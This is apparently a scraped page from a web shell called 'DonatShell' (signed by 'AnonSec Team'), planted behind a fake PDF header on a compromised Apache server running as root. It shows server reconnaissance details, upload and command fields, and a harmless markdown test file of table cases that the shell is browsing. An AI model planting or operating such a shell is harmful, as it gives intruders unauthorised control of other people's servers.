%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/11585/cwd/html/water/vendor/cebe/markdown/tests/extra-data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/11585/cwd/html/water/vendor/cebe/markdown/tests/extra-data/tables.md
Tables
------

First Header  | Second Header
------------- | -------------
Content Cell  | Content Cell
Content Cell  | Content Cell

| First Header  | Second Header |
| ------------- | ------------- |
| Content Cell  | Content Cell  |
| Content Cell  | Content Cell  |

| Name | Description          |
| ------------- | ----------- |
| Help      | Display the help window.|
| Close     | Closes a window     |

| Name | Description          |
| ------------- | ----------- |
| Help      | **Display the** help window.|
| Close     | _Closes_ a window     |

| Default-Align | Left-Aligned  | Center Aligned  | Right Aligned |
| ------------- | :------------ |:---------------:| -----:|
| 1             | col 3 is      | some wordy text | $1600 |
| 2             | col 2 is      | centered        |   $12 |
| 3             | zebra stripes | are neat        |    $1 |


Simple | Table
------ | -----
1      | 2
3      | 4

| Simple | Table |
| ------ | ----- |
| 1      | 2     |
| 3      | 4     |
| 3      | 4     \|
| 3      | 4    \\|

Check https://github.com/erusev/parsedown/issues/184 for the following:

Foo | Bar | State
------ | ------ | -----
`Code | Pipe` | Broken | Blank
`Escaped Code \| Pipe` | Broken | Blank
Escaped \| Pipe | Broken | Blank
Escaped \\| Pipe | Broken | Blank
Escaped \\ | Pipe | Broken | Blank

| Simple | Table |
| :----- | ----- |
| 3      | 4     |
3      | 4
5

Mixed | Table
------ | -----
| 1      | 2
3      | 4

| Mixed | Table
------ | -----
| 1      | 2
3      | 4

 Mixed | Table
|------ | ----- |
 1      | 2
| 3      | 4 |

some text

| single col |
| -- |  -- |
| 1 |
2
3

| Table | With | Empty | Cells |
| ----- | ---- | ----- | ----- |
|       |      |       |       |
|   a   |      |   b   |       |
|       |  a   |       |   b   |
|   a   |      |       |   b   |
|       |  a   |   b   |       |

   |
-- | --
   |
   
|   |   |
| - | - |
|   |   |

 | Table | Indentation |
 | ----- | ---- |
   | A     | B    |

  | Table | Indentation |
  | ----- | ---- |
   | A     | B    |

 | Table | Indentation |
   | ----- | ---- |
 | A     | B    |

    | Table | Indentation |
   | ----- | ---- |
 | A     | B    |

| Table | Indentation |
    | :----- | ---- |
    | A     | B    |

| Item      | Value |
| --------- | -----:|
| Computer  | $1600 |
| Phone     |   $12 |
| Pipe      |    $1 |

| a | b | c |
|:-:|:-:|:-:|
| 1 | 2 | 3 |

| a | b | c | d |
|:--|:-:|:--|:-:|
| 1 | 2 | 3 | 4 |

Anon7 - 2022
AnonSec Team